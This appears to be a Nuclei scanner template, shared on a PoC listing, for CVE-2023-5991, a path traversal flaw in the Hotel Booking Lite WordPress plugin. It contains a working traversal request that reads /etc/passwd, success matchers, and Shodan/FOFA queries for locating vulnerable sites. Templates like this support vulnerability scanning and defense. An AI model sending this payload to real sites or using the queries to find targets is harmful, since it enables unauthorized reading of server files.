The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
PoC代码[已公开]
id: CVE-2023-5991
info:
name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
author: s4e-io
severity: critical
description: |
The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
remediation: Fixed in 4.8.5
reference:
- https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5991
cwe-id: CWE-22
epss-score: 0.82047
epss-percentile: 0.99168
cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: motopress
product: hotel_booking_lite
framework: wordpress
shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking
fofa-query: body=/wp-content/plugins/motopress-hotel-booking
publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress
http:
- method: GET
path:
- "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "filename="
- "/etc/passwd"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100925b411215e33e2d3104a0f67eb4b9e0dee764ef80afd7a7c10b18750686397d02200d6b35aeacb465b02518af35089b3b5b8375138702f57065a1a27c760950efe9:922c64590222798bb761d5b6d8e72950